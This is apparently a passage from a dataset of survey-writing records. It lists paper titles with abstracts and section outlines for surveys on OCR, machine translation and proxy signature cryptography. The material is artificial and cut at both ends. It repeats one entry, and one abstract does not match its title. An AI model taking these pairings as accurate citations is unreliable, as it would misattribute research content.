We then discuss approaches for post-processing and show their relation to the Arabic language. We conclude by pointing problems and directions for future research on AOTR. --- paper_title: Automatic Number Plate Recognition System for Vehicle Identification Using Optical Character Recognition paper_content: Automatic Number Plate Recognition (ANPR) is an image processing technology which uses number (license) plate to identify the vehicle. The objective is to design an efficient automatic authorized vehicle identification system by using the vehicle number plate. The system is implemented on the entrance for security control of a highly restricted area like military zones or area around top government offices e.g. Parliament, Supreme Court etc. The developed system first detects the vehicle and then captures the vehicle image. Vehicle number plate region is extracted using the image segmentation in an image. Optical character recognition technique is used for the character recognition. The resulting data is then used to compare with the records on a database so as to come up with the specific information like the vehicle’s owner, place of registration, address, etc. The system is implemented and simulated in Matlab, and it performance is tested on real image. It is observed from the experiment that the developed system successfully detects and recognize the vehicle number plate on real images. --- paper_title: Neuro semantic thresholding using OCR software for high precision OCR applications paper_content: This paper describes a novel approach to binarization techniques. It presents a way of obtaining a threshold that depends both on the image and the final application using a semantic description of the histogram and a neural network. The intended applications of this technique are high precision OCR algorithms over a limited number of document types. The input image histogram is smoothed and its derivative is found. Using a polygonal version of the derivative and the smoothed histogram, a new description of the histogram is calculated. Using this description and a training set, a general neural network is capable of obtaining an optimum threshold for our application. --- paper_title: A Generalized Thinning Algorithm for Cursive and Non-Cursive Language Scripts paper_content: One of the most crucial phases in the process of text recognition is thinning of characters to a single pixel notation. The success measure of any thinning algorithm lies in its property to retain the original character shape, which are also called unit-width skeletons. No agreed universal thinning algorithm exists to produce character skeletons from different languages, which is a pre-process for all subsequent phases of character recognition such as segmentation, feature extraction, classification, etc. Written natural languages based on their intrinsic properties can be classified as cursive and non-cursive. Thinning algorithms when applied on cursive languages, poses greater complexity due to their distinct non-isolated boundaries and complex character shapes such as in Arabic, Sindhi, Urdu, etc. Such algorithms can easily be extended for parallel implementations. Selecting certain pixel arrangement grid templates over the other pixel patterns for the purpose of generating character skeletons exploits the parallel programming. The success key is in determining the right pixel arrangement grids that can reduce the cost of iterations required to evaluate each pixel for selecting for thinning or ignoring. This paper presents an improved parallel thinning algorithm, which can be easily extended for cursive or non-cursive languages alike by introducing a modified set of preservation rules via pixel arrangement grid templates, making it both robust to noise and speed. Experimental results show its success over cursive languages like Arabic, Sindhi, Urdu and non-cursive languages like English, Chinese and even numerals. Thus making it probably a universal thinning algorithm --- paper_title: Convolutional Neural Network Committees for Handwritten Character Classification paper_content: In 2010, after many years of stagnation, the MNIST handwriting recognition benchmark record dropped from 0.40% error rate to 0.35%. Here we report 0.27% for a committee of seven deep CNNs trained on graphics cards, narrowing the gap to human performance. We also apply the same architecture to NIST SD 19, a more challenging dataset including lower and upper case letters. A committee of seven CNNs obtains the best results published so far for both NIST digits and NIST letters. The robustness of our method is verified by analyzing 78125 different 7-net committees. --- paper_title: Convolutional Neural Network Committees for Handwritten Character Classification paper_content: In 2010, after many years of stagnation, the MNIST handwriting recognition benchmark record dropped from 0.40% error rate to 0.35%. Here we report 0.27% for a committee of seven deep CNNs trained on graphics cards, narrowing the gap to human performance. We also apply the same architecture to NIST SD 19, a more challenging dataset including lower and upper case letters. A committee of seven CNNs obtains the best results published so far for both NIST digits and NIST letters. The robustness of our method is verified by analyzing 78125 different 7-net committees. ---
Title: A Survey on Optical Character Recognition System Section 1: Literature Review Description 1: Summarize the historical background and evolution of Optical Character Recognition (OCR) systems from early mechanical devices to modern advancements, including key milestones and research developments. Section 2: Types of Optical Character Recognition Systems Description 2: Discuss the various categories of OCR systems based on different criteria such as image acquisition mode, character connectivity, and font restrictions. Highlight the characteristics and challenges of different types. Section 3: Major Phases of OCR Description 3: Outline the primary steps involved in the OCR process, detailing each phase along with its significance and common techniques used. Section 4: Image Acquisition Description 4: Elaborate on the initial step of OCR which involves capturing and converting a digital image into a suitable format for processing. Discuss techniques like quantization and compression. Section 5: Pre-processing Description 5: Describe the methods used to enhance the quality of the captured image including thresholding, filtering, morphological operations, and skew estimation. Section 6: Character Segmentation Description 6: Explain the process of segmenting the image into individual characters, and how this step is crucial for effective classification. Section 7: Feature Extraction Description 7: Investigate the techniques used to extract distinctive features from segmented characters. Discuss the importance of selecting the right features and methods like principal component analysis. Section 8: Classification Description 8: Detail the methods used to classify characters into appropriate categories using structural and statistical approaches. Mention common classifiers such as Bayesian, neural networks, and decision trees. Section 9: Post-processing Description 9: Discuss techniques to enhance the accuracy of OCR results after initial classification, including the use of multiple classifiers, contextual analysis, and lexical processing. Section 10: Conclusion Description 10: Provide a summary of the paper, highlighting the importance of each phase in OCR, potential applications, current challenges especially in recognizing complex languages, and recommendations for future research directions.
A Survey Of Machine Translation: Its History, Current Status, And Future Prospects
13
--- paper_title: Computerized russian translation at ORNL paper_content: Since 1964, as an adjunct to its automated technical information processing services to ERDA and other federal agencies, a generalized language translation system has been used by the Oak Ridge National Laboratory (ORNL) to translate Russian scientific text to English. The translation system, first implemented at Georgetown University around 1960, has been rewritten and improved through the years as computer models changed. Although the translations lack high literary quality, the system, by means of its context sensitive dictionary, nevertheless provides inexpensive, fast and highly useful translations of scientific literature. The method used involves a linguistically‐oriented programming language called Simulated Linguistic Computer (SLC), with which a language‐specific dictionary can be written for use by the translation system. The dictionary entry for any word can be augmented by procedures which permit its meaning to be modified by its context; more general linguistic procedures operate on the sentence as a whole. In an evaluation of user reaction, over ninety percent of the respondents rated the machine translation (MT) service “good” or “acceptable” on translations of their subject specialty. Development, implementation, and documentation of the system are continuing, as we meet increasing requests for service and attempt new applications of the MT system. --- paper_title: Multi-Level Translation Aids In A Distributed System paper_content: At COLING80, we reported on an Interactive Translation System called ITS. We will discuss three problems in the design of the first version of ITS: (1) human factors, (2) the "all or nothing" syndrome, and (3) traditional centralized processing. We will also discuss a new version of ITS, which is now being programmed. This new version will hopefully overcome these problems by placing the translator in control, providing multiple levels of aid, and distributing the processing. --- paper_title: QUALITY CONTROL PROCEDURES IN MODIFICATION OF THE AIR FORCE RUSSIAN-ENGLISH MT SYSTEM paper_content: The paper gives the background leading to the development of current quality control procedures used in modification of the Russian-English system. A special program showing target language translation differences has become the central control mechanism. Procedures for modification of dictionaries, homographs and lexicals, and generalized linguistic modules are discussed in detail. A final assessment is made of the procedures and the quantitative results that can be obtained when they are used. --- paper_title: Further Experiments in Language Translation: A Second Evaluation of the Readability of Computer Translations, paper_content: Application of computational linguistics, i.e., language translation by computer, has been proposed as a means of producing readable translations of technical English-to-Vietnamese. This report is about an experimental study of the readability of translations that could be used for training or equipment maintenance. The experiments involved assessing the readability of Vietnamese that had been translated from English by three methods: (1) expert human translators, (2) un-edited translation by computer, and (3) edited computer translation. English was a control condition. Readers included two groups of student pilots : 168 in the Vietnamese Air Force (VNAF) and 88 in the USAF. Material that was translated consisted of three 500-word passages sampled from a standard Air Force text, Instrument Flying. Readability was measured by : (1) reading comprehension tests, (2) cloze procedure, and (3) clarity ratings. Time to complete each of these tasks was also measured. Major conclusions of the study are : (1) expert human translators produce more readable translations of technical English-to-Vietnamese than is done by computer; (2) Vietnamese readers, trained in English, show the highest comprehension when dealing with that language; (3) comprehension loss becomes relatively greater, as more and more difficult material is read, for computer-based translations than for human translations; (4) method of translation does not affect reading speed. --- paper_title: AN INTERACTIVE ON-LINE MACHINE TRANSLATION SYSTEM (CHINESE INTO ENGLISH) paper_content: The present on-line system is a direct conversion of the CULT (batch) machine translation system which has been used since January 1975 on a regular basis in translating Chinese mathematics journals. The pre-editing procedures used in CULT are being implemented in the present on-line system by means of editing programs. The enormous problem of inputting Chinese texts is being solved by keying the text directly with a newly designed Chinese keyboard. --- paper_title: Machine Translation - Past, Present, and Future paper_content: The attempt to translate meaning from one language to another by formal means traces back to the philosophical schools of secret and universal languages as they were originated by Ramon Llull or Johann Joachim Becher. Until today, machine translation (MT) is known as the crowning discipline of natural language processing. Due to current MT approaches, the time needed to develop new systems with similar power to the older ones, has decreased enormously. However, when comparing current achievements to those of thirty years ago, only a minor dierence in the number and type of errors can be observed. In this article, the history of MT, the dierence to computer aided translation and the current approaches are discussed. --- paper_title: An Application Of MONTAGUE Grammar To English-Japanese Machine Translation paper_content: English-Japanese machine translation requires a large amount of structural transformations in both grammatical and conceptual level. In order to make its control structure clearer and more understandable, this paper proposes a model based on Montague Gramamr. Translation process is modeled as a data flow computation process. Formal description tools are developed and a prototype system is constructed. Various problems which arise in this modeling and their solutions are described. Results of experiments are shown and it is discussed how far initial goals are achieved. --- paper_title: Knowledge Representation And Machine Translation paper_content: This paper describes a new knowledge representation called "frame knowledge representation-0" (FKR-0), and an experimental machine translation system named ATLAS/I which uses FKR-0.The purpose of FKR-0 is to stored information required for machine translation processing as flexibly as possible, and to make the translation system as expandable as possible. --- paper_title: Design Characteristics of a Machine Translation System paper_content: This paper distinguishes a set of criteria to be met by a machine translation system (EUROTRA) currently being planned under the sponsorship of the Commission of the European Communities and attempts to show the effect of meeting those criteria on the overall system design. ---
Title: A Survey Of Machine Translation: Its History, Current Status, And Future Prospects Section 1: INTRODUCTION Description 1: This section provides a historical overview and sets the context for the survey, highlighting the different phases of MT's development and its current resurgence. Section 2: THE HUMAN TRANSLATION CONTEXT Description 2: This section discusses the standards and practices of human translation, contrasting them with machine translation, and emphasizing the importance of post-editing and domain expertise. Section 3: MACHINE TRANSLATION TECHNOLOGY Description 3: This section delves into the various categories, purposes, and technologies behind machine translation, explaining the broad classifications and specific applications for MT. Section 4: CATEGORIES OF SYSTEMS Description 4: This section categorizes translation tools into Machine Translation (MT), Machine-aided Translation (MAT), and Terminology Data banks, describing their different levels of human intervention and use cases. Section 5: THE PURPOSES OF TRANSLATION Description 5: This section explores the main purposes of translation, differentiating between information acquisition and information dissemination, and the specific needs for rapid and precise translations in different contexts. Section 6: INTENDED APPLICATIONS OF M(A)T Description 6: This section identifies the primary applications for Machine-aided Translation (MAT) systems, particularly in the field of technical translation, and contrasts it with the lesser demand for literary translation. Section 7: LINGUISTIC TECHNIQUES Description 7: This section reviews the different linguistic techniques employed in MT systems, distinguishing between direct and indirect translation, interlingua and transfer approaches, and local versus global scope. Section 8: HISTORICAL PERSPECTIVE Description 8: This section provides a detailed history of various notable MT projects and systems, such as GAT, TIQUE, METAL, TAUM, ALP, and others, outlining their development, challenges, and impacts. Section 9: CURRENT PRODUCTION SYSTEMS Description 9: This section identifies and reviews the major Machine Translation systems and Machine-aided Translation systems currently in use or marketed, discussing their implementations and user experiences. Section 10: CURRENT RESEARCH AND DEVELOPMENT Description 10: This section surveys ongoing research and development efforts in MT, highlighting projects in Japan, Europe, and the U.S., and discussing their goals and innovations. Section 11: THE STATE OF THE ART Description 11: This section evaluates the current state of MT technology, analyzing the capabilities, limitations, and progress in production systems, development systems, and research systems. Section 12: FUTURE PROSPECTS Description 12: This section forecasts the future of Machine Translation, predicting greater acceptance and integration of MT systems, the need for advanced R&D, and the evolving demands for translation services. Section 13: CONCLUSIONS Description 13: This section concludes the survey by summarizing the inevitability of MT development due to the persistent demand for translation, the successes of existing systems, and the necessity for continued research.
Algorithms and Approaches of Proxy Signature: A Survey
13
--- paper_title: Proxy multi-signature scheme: a new type of proxy signature scheme paper_content: Proxy signature schemes allow a proxy signer to generate a proxy signature on behalf of an original signer. However, since in previous proxy signature schemes a proxy signature is created on behalf of only one original signer, these schemes are referred to as proxy mono-signature schemes. A new type of proxy signature scheme is presented called the proxy multi-signature scheme in which a proxy signer can generate a proxy signature on behalf of two or more original signers. --- paper_title: Repudiation of Cheating and Non-repudiation of Zhang's Proxy Signature Schemes paper_content: The paper discusses the correctness of Lee, Hwang and Wang's comments on on Zhang's proxy signature schemes. In particular, it is shown that the cheating attack proposed by Lee, Hwang and Wang can be detected by the owner of the signature scheme. It is argued that considering the context in which proxy signatures are used, the attack is not a security problem. The work is concluded by a discussion about the non-repudiation controversy incorrectly observed by Lee, Hwang and Wang. --- paper_title: The Digital Distributed System Security Architecture paper_content: The Digital Distributed System Security Architecture is a comprehensive speci cation for security in a distributed system that employs state-of-the-art concepts to address the needs of both commercial and government environments. The architecture covers user and system authentication, mandatory and discretionary security, secure initialization and loading, and delegation in a general-purpose computing environment of heterogeneous systems where there are no central authorities, no global trust, and no central controls. The architecture prescribes a framework for all applications and operating systems currently available or to be developed. Because the distributed system is an open OSI environment, where functional interoperability only requires compliance with selected protocols needed by a given application, the architecture must be designed to securely support systems that do not implement or use any of the security services, while providing extensive additional security capabilities for those systems that choose to implement the architecture. --- paper_title: Proxy signature schemes based on factoring paper_content: The proxy signature schemes allow proxy signers to sign messages on behalf of an original signer, a company or an organization. However, most of existing proxy signature schemes are based on the discrete logarithm problem. In this paper, the author would like to propose two efficient proxy signature schemes based on the factoring problem, which combine the RSA signature scheme and the Guillou-Quisquater signature scheme. One is a proxy-unprotected signature scheme that is more efficient. No matter how many proxy signers cooperatively sign a message, the computation load for verifiers would remain almost constant. The other is a proxy-protected signature scheme that is more secure. Finally, to protect the privacy of proxy signers, the author proposes a proxy-protected signature scheme with anonymous proxy signers. --- paper_title: Revisiting Fully Distributed Proxy Signature Schemes paper_content: In a proxy signature scheme, a potential signer delegates his capabilities to a proxy signer, who can sign documents on behalf of him. The recipient of the signature verifies both identities: that of the delegator and that of the proxy signer. There are many proposals of proxy signature schemes, but security of them has not been considered in a formal way until the appearance of [2,8]. ::: ::: If the entities which take part in a proxy signature scheme are formed by sets of participants, then we refer to it as a fully distributed proxy signature scheme [4]. ::: ::: In this work, we extend the security definitions introduced in [2] to the scenario of fully distributed proxy signature schemes, and we propose a specific scheme which is secure in this new model. --- paper_title: Improved Non-Repudiable Threshold Proxy Signature Scheme with Known Signers paper_content: In 2001, Hsu et al. proposed a non-repudiable threshold proxy signature with known signers. In their scheme, the proxy group cannot deny having signed the proxy signature if they did. However, Hsu et al.'s scheme is vulnerable to some attacks. A malicious original signer or malicious proxy signer can impersonate some other proxy signers to generate proxy signatures. In this article, we shall present our cryptanalysis of the Hsu et al.'s scheme. After that, we shall propose a new threshold proxy signature that can overcome the weaknesses. --- paper_title: The Hierarchy of Key Evolving Signatures and a Characterization of Proxy Signatures paper_content: For the last two decades the notion and implementations of proxy signatures have been used to allow transfer of digital signing power within some context (in order to enable flexibility of signers within organizations and among entities). On the other hand, various notions of the key-evolving signature paradigms (forward-secure, key-insulated, and intrusion-resilient signatures) have been suggested in the last few years for protecting the security of signature schemes, localizing the damage of secret key exposure. In this work we relate the various notions via direct and concrete security reductions that are tight. We start by developing the first formal model for fully hierarchical proxy signatures, which, as we point out, also addresses vulnerabilities of previous schemes when self-delegation is used. Next, we prove that proxy signatures are, in fact, equivalent to key-insulated signatures. We then use this fact and other results to establish a tight hierarchy among the key-evolving notions, showing that intrusion-resilient signatures and key-insulated signatures are equivalent, and imply forward-secure signatures. We also introduce other relations among extended notions. Besides the importance of understanding the relationships among the various notions that were originally designed with different goals or with different system configuration in mind, our findings imply new designs of schemes. For example, many proxy signatures have been presented without formal model and proofs, whereas using our results we can employ the work on key-insulated schemes to suggest new provably secure designs of proxy signatures schemes. --- paper_title: Efficient proxy multisignature schemes based on the elliptic curve cryptosystem paper_content: For improving proxy-signature research, Sun [5] attempted to resolve problems related to defective security in the scheme of Yi [3]. However, both Yi and Sun's schemes involve a significant number of exponential operations to verify the proxy signature. Accordingly, an improvement is proposed here to change the exponential operations into elliptic curve multiplicative ones. As proposed by both Koblitz [6-7] and Miller [8] in 1985, the elliptic curve is used in developing the cryptosystems. The elliptic curve cryptosystem can achieve a level of security equal to that of RSA or DSA but has a lower computational overhead and a smaller key size than both of these. Therefore, it is used in Sun's schemes to improve their efficiency. --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: An efficient nonrepudiable threshold proxy signature scheme with known signers paper_content: A (t,n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. A threshold proxy signature scheme with the nonrepudiation property is a scheme with the capability that any verifier can identify the proxy group which is responsible for a proxy signature, while the proxy group cannot deny. So far, there have been two threshold proxy signature schemes proposed. Of these, Kim's scheme is nonrepudiable, but Zhang's scheme is not. In these two schemes, the t proxy signers from the group who actually sign the message are unknown and unidentified. This is very inconvenient for auditing purposes. For the responsibility of the actual signers and the traceability of adversarial signers, it is sometimes necessary to identify who the actual signers are. In this article, we propose the nonrepudiable threshold proxy signature scheme with known signers which is a nonrepudiable threshold proxy signature scheme with the property that the actual signers from the proxy group are known and identified. --- paper_title: Convertible Nominative Signatures paper_content: A feasible solution to prevent potential misuse of signatures is to put some restrictions on their verification. Therefore S.J.Kim, [4] S.J.Park and D.H.Won introduced the nominative signature, in which only the nominee can verify and prove the validity of given signatures, and proposed a nominative signature scheme (called KPW scheme). In this paper, we first show that KPW scheme is not nominative because the nominator can also verify and prove the validity of given signatures. Then we extend the concept of nominative signature to the convertible nominative signature which has an additional property that the nominee can convert given nominative signatures into universally verifiable signatures. We give a formal definition for it and propose a practical scheme that implements it. The proposed scheme is secure, in which its unforgeability is the same as that of the Schnorr’s signature scheme and its untransferability relies on the hardness of the Decision-Diffie-Hellman Problem. --- paper_title: Secure Mobile Agent Digital Signatures with Proxy Certificates paper_content: Security issues related to the usage of mobile agents in performing operations to which their owners have to be bound, such as payments, are of utmost importance if this kind of agents are to be used in electronic commerce. If this binding is achieved by means of digital signature techniques, this means agents have to carry the owner's private key to the host where they sign documents. This exposes the key to attacks because it is copied outside a protected environment. In this paper, we present a mechanism, called proxy certificates, that avoids the need for the agent to have access to the user's private key for digitally signing documents, but still binds the owner to the contents of those documents. In order to support our claims, we apply the mechanism to SET/A, an agent-based payment system we proposed in previous work. We also analyze the emerging technology of attribute certificates and argue that it is appropriate to implement proxy certificates. --- paper_title: Improvement of threshold proxy signature scheme paper_content: Abstract A (t, n) threshold proxy signature scheme allows any t or more proxy signers to cooperatively sign messages on behalf of an original signer, but t−1 or fewer proxy signers cannot. Sun et al. proposed a new (t, n) threshold proxy signature scheme based on Zhang's threshold proxy signature scheme. Recently, Hsu et al. pointed out that Sun's scheme suffered from a drawback and proposed an improvement to counter it. However, the author of this paper shows that both Sun's scheme and Hsu's improvement are not secure against coalition attack. Some t or more malicious proxy signers can conspire together against the original signer. Finally, we propose a new improvement to counter this attack, the proxy generation and the signature computation of which is more efficient than those of Sun's scheme and Hsu's improvement. The main advantage of the new improvement is traceability, by which the original signer can identify the actual signers that are anonymous to outsiders. --- paper_title: A SECURE NONREPUDIABLE THRESHOLD PROXY SIGNATURE SCHEME WITH KNOWN SIGNERS paper_content: In the (t;n) proxy signature scheme, the signature, originally signed by a signer, can be signed by t or more proxy signers out of a proxy group of n members. Recently, an efficient nonrepudiable threshold proxy signature scheme with known signers was proposed by H.-M. Sun. Sun's scheme has two advantages. One is nonrepudiation. The proxy group cannot deny that having signed the proxy signature. Any verifier can identify the proxy group as a real signer. The other is identifiable signers. The verifier is able to identify the actual signers in the proxy group. Also, the signers cannot deny that having generated the proxy signature. In this article, we present a cryptanalysis of the Sun's scheme. Further, we propose a secure, nonrepudiable and known signers threshold proxy signature scheme which remedies the weakness of the Sun's scheme. --- paper_title: Handbook of Applied Cryptography paper_content: From the Publisher: ::: A valuable reference for the novice as well as for the expert who needs a wider scope of coverage within the area of cryptography, this book provides easy and rapid access of information and includes more than 200 algorithms and protocols; more than 200 tables and figures; more than 1,000 numbered definitions, facts, examples, notes, and remarks; and over 1,250 significant references, including brief comments on each paper. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Further Cryptanalysis of some Proxy Signature Schemes paper_content: Proxy signature is a signature that an original signer delegates his or her signing capability to a proxy signer, and then the proxy signer creates a signature on behalf of the original signer. However, Sun et al. [7] showed that the proxy and multi-proxy signatures of Lee et al. [3], and the strong proxy signature scheme with proxy signer privacy protection of Shum et al. [6] are not against the original signer’s forgery attack, so these schemes do not process the property of unforgeability. In this paper, we present an extensive forgery method on these schemes, following the work due to Sun et al. --- paper_title: Comments on "A practical (t, n) threshold proxy signature scheme based on the RSA cryptosystem" paper_content: In a (t, n) threshold proxy signature scheme, the original signer can delegate his/her signing capability to n proxy signers such that any t or more proxy signers can sign messages on behalf of the former, but t-1 or less of them cannot do the same thing. Such schemes have been suggested for use in a number of applications, particularly, in distributed computing where delegation of rights is quite common. Based on the RSA cryptosystem, [M. -S. Hwang et al. (2003) recently proposed an efficient (t, n) threshold proxy signature scheme. We identify several security weaknesses in their scheme and show that their scheme is insecure. --- paper_title: An Efficient Signature Scheme from Bilinear Pairings and Its Applications paper_content: In Asiacrypt2001, Boneh, Lynn, and Shacham [8] proposed a short signature scheme (BLS scheme) using bilinear pairing on certain elliptic and hyperelliptic curves. Subsequently numerous cryptographic schemes based on BLS signature scheme were proposed. BLS short signature needs a special hash function [6,1,8]. This hash function is probabilistic and generally inefficient. In this paper, we propose a new short signature scheme from the bilinear pairings that unlike BLS, uses general cryptographic hash functions such as SHA-1 or MD5, and does not require special hash functions. Furthermore, the scheme requires less pairing operations than BLS scheme and so is more efficient than BLS scheme. We use this signature scheme to construct a ring signature scheme and a new method for delegation. We give the security proofs for the new signature scheme and the ring signature scheme in the random oracle model. --- paper_title: An analysis of proxy signatures: is a secure channel necessary? paper_content: Montgomery Prime Hashing (MPH) is a scheme for message authentication based on universal hashing.I n MPH, roughly speaking, the hash value is computed as the Montgomery residue of the message with respect to a secret modulus.The modulus value is structured in a way that allows fast, compact implementations in both hardware and software.The set of allowed modulus values is large, and as a result, MPH achieves good, provable security. ::: ::: MPH performance is comparable to that of other high-speed schemes such as MMH. An advantage of MPH is that the secret key (i.e., the modulus) is small, typically 128-256 bits, while in MMH the secret key is typically much larger.I n applications where MMH key length is problematic, MPH may be an attractive alternative. --- paper_title: A Digital Nominative Proxy Signature Scheme for Mobile Communication paper_content: Based on the development of mobile communication, the future mobile communication systems are expected to provide higher quality of multimedia services for users than today's systems. Therefore, many technical factors are needed in this systems. Especially the secrecy and the safety would be obtained through the introduction of the security for mobile communication. In this paper, we presents a digital nominative proxy signature scheme that processes a user's digital signature and encryption using the proxy-agent who has more computational power than origins in mobile communication. --- paper_title: On Zhang's Nonrepudiable Proxy Signature Schemes paper_content: In 1997, Zhang proposed two new nonrepudiable proxy signature schemes to delegate signing capability. Both schemes claimed to have a property of knowing that a proxy signature is generated by either the original signer or a proxy signer. However, this paper will show that Zhang's second scheme fails to possess this property. Moreover, we shall show that the proxy signer can cheat to get the original signer's signature, if Zhang's scheme is based on some variants of ElGamal-type signature schemes. We modify Zhang's nonrepudiable proxy signature scheme to avoid the above attacks. The modified scheme also investigates a new feature for the original signer to limit the delegation time to a certain period. --- paper_title: Design of time-stamped proxy signatures with traceable receivers paper_content: A proxy signature scheme is a method which allows an original signer to delegate his signing power to a proxy signer. Most proxy signature schemes use a warrant appearing in the signature verification equation to declare the valid delegation period. However, the declaration in the warrant is useless because no-one can know the exact time when the proxy signer signed a message. To avoid the proxy signer abusing the signing capability, the original signer may hope to know the identity of who received the proxy signature from the proxy signer. Recently Sun and Chen proposed the concept of time-stamped proxy signatures with traceable receivers to solve these two problems. A time-stamped proxy signature scheme with traceable receivers is a proxy signature scheme which can ascertain whether a proxy signature is created during the delegation period, and can trace who actually received the proxy signatures from the proxy signer. The author shows that Sun and Chen's scheme suffers from weaknesses and consequently proposes a new time-stamped proxy signature scheme which doesn't suffer from the same weaknesses. --- paper_title: ID-Based Multi-Proxy Signature and Blind Multisignature from Bilinear Pairings paper_content: Multi-proxy signature allows the original signer delegate his singing power to a group of proxy signers. Blind proxy-signature allows the user to obtain a signature of a message from several signers in a way that each signer learns neither the message nor the resulting signature. Plenty of multi-proxy signature and blind multisignature schemes have been proposed under the certificate-based (CA-based) public key systems. In this paper, we firstly propose an identity-based (IDbased) multi-proxy signature scheme and an ID-based blind multisignature scheme from bilinear pairings. Since there seems no ID-based threshold signature schemes up to now, both the proposed schemes can be regarded as a special case of corresponding variants of ID-based threshold signature. --- paper_title: Cryptanalysis of Nonrepudiable Threshold Proxy Signature Schemes with Known Signers paper_content: Sun's nonrepudiation threshold proxy signature scheme is not secure against the collusion attack. In order to guard against the attack, Hwang et al. proposed another threshold proxy signature scheme. However, a new attack is proposed to work on both Hwang et al.'s and Sun's schemes. By executing this attack, one proxy signer and the original signer can forge any valid proxy signature. Therefore, both Hwang et al.'s scheme and Sun's scheme were insecure. --- paper_title: A strong proxy signature scheme with proxy signer privacy protection paper_content: Mambo et al. (1996) discussed the delegation of signature power to a proxy signer. Lee et al. (2001) constructed a strong non-designated proxy signature scheme in which the proxy signer had strong non-repudiation. In this paper, we present an enhancement to their scheme such that the identity of the proxy signer is hidden behind an alias. The identity can be revealed only by the alias authority. We also discuss other applications of this technique. --- paper_title: New Proxy Signature, Proxy Blind Signature and Proxy Ring Signature Schemes from Bilinear Pairings paper_content: Proxy signatures are very useful tools when one needs to delegate his/her signing capability to other party. After Mambo et al.’s first scheme was announced, many proxy signature schemes and various types of proxy signature schemes have been proposed. Due to the various applications of the bilinear pairings in cryptography, there are many IDbased signature schemes have been proposed. In this paper, we address that it is easy to design proxy signature and proxy blind signature from the conventional ID-based signature schemes using bilinear pairings, and give some concrete schemes based on existed ID-based signature schemes. At the same time, we introduce a new type of proxy signature – proxy ring signature, and propose the first proxy ring signature scheme based on an existed ID-based ring signature scheme. --- paper_title: A traceable proxy multisignature scheme based on the elliptic curve cryptosystem paper_content: This study contributes to the public delivery of the delegation parameter and reduces the number of operations required to verify a proxy signature. A new proxy-protected proxy multisignature scheme is also proposed, which is based on the elliptic curve discrete logarithm problem (ECDLP). The proposed scheme inherits most of its merits from typical solutions to the discrete logarithm problem (DLP), thereby meeting the demand for security. The scheme that is based on the elliptic curve cryptosystem (ECC) can perform more efficiently than those based on DLP. --- paper_title: Designated-verifier proxy signatures for e-commerce paper_content: In a designated-verifier proxy signature scheme, a user delegates her/his signing capability to another user in such a way that the latter can sign messages on behalf of the former, but the validity of generated signatures can only be checked by the designated verifier. In this paper, we first point out that one such scheme proposed recently by Dai et al. is insecure. To overcome the weaknesses in their scheme, based on the two-party Schnorr signature by Nicolosi et al., we present a new designated-verifier proxy signature scheme which is efficient and secure. Finally, we suggest the use of our scheme in electronic commerce applications, such as sale of digital products (digital music, movies, and books etc.). --- paper_title: On the Security of Some Proxy Signature Schemes paper_content: Digital signature scheme is an important research topic in cryptography. An ordinary digital signature scheme allows a signer to create signatures of documents and the generated signatures can be verified by any person. A proxy signature scheme, a variation of ordinary digital signature scheme, enables a proxy signer to sign messages on behalf of the original signer. To be used in different applications, many proxy signatures were proposed. In this paper, we review Lee et al.’s strong proxy signature scheme, multi-proxy signature scheme, and its application to a secure mobile agent, Shum and Wei’s privacy protected strong proxy signature scheme, and Park and Lee’s nominative proxy signature scheme, and show that all these proxy signature schemes are insecure against the original signer’s forgery. In other words, these schemes do not possess the unforgeability property which is a desired security requirement for a proxy signature scheme. --- paper_title: A practical (t, n) threshold proxy signature scheme based on the RSA cryptosystem paper_content: In a (t, n) threshold proxy signature scheme, the original signer delegates the power of signing messages to a designated proxy group of n members. Any t or more proxy signers of the group can cooperatively issue a proxy signature on behalf of the original signer, but (t - 1) or less proxy signers cannot. Previously, all of the proposed threshold proxy signature schemes have been based on the discrete logarithm problem and do not satisfy all proxy requirements. In this paper, we propose a practical, efficient, and secure (t, n) threshold proxy signature scheme based on the RSA cryptosystem. Our scheme satisfies all proxy requirements and uses only a simple Lagrange formula to share the proxy signature key. Furthermore, our scheme requires only 5 percent of the computational overhead and 8 percent of the communicational overhead required in Kim's scheme. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: ID-Based Proxy Signature Using Bilinear Pairings paper_content: Identity-based (ID-based) public key cryptosystem can be a good alternative for certificate-based public key setting, especially when efficient key management and moderate security are required. A proxy signature scheme permits an entity to delegate its signing rights to another entity. But to date, no ID-based proxy signature scheme with 